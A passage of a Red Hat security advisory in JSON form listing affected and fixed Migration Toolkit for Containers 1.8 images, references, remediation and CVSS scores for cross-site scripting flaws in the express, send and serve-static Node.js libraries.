"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
